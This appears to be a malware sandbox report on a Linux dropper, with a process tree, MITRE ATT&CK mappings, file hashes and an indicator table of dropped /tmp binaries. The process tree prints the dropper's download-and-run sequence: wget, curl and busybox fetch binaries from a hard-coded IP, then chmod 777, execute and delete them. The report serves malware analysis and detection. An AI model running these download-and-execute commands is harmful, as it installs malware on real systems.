- /usr/bin/wget
  wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  PID:1687
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  - Writes file to tmp directory
  PID:1688
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  PID:1689
- /bin/chmod
  chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  - File and Directory Permissions Modification
  PID:1690
- /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  ./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  - Executes dropped EXE
  PID:1691
- /bin/rm
  rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  PID:1693
- /usr/bin/wget
  wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  PID:1694
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  - Writes file to tmp directory
  PID:1695
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  PID:1696
- /bin/chmod
  chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  - File and Directory Permissions Modification
  PID:1697
- /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  ./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  - Executes dropped EXE
  PID:1698
- /bin/rm
  rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  PID:1700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit

ioc	pid	Process
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1	1509	HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU	1516	kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1	1523	XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7	1530	f4er80WdZpB65CEraApSmbUBPranpIfNx7
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT	1537	Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC	1544	edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4	1551	K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f	1558	QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY	1565	PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl	1572	XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw	1579	Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY	1586	VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh	1593	irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq	1600	r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1	1607	HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU	1614	kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1	1621	XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7	1628	f4er80WdZpB65CEraApSmbUBPranpIfNx7
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT	1635	Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC	1642	edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4	1649	K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f	1656	QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY	1663	PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl	1670	XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw	1677	Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY	1684	VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh	1691	irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq	1698	r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq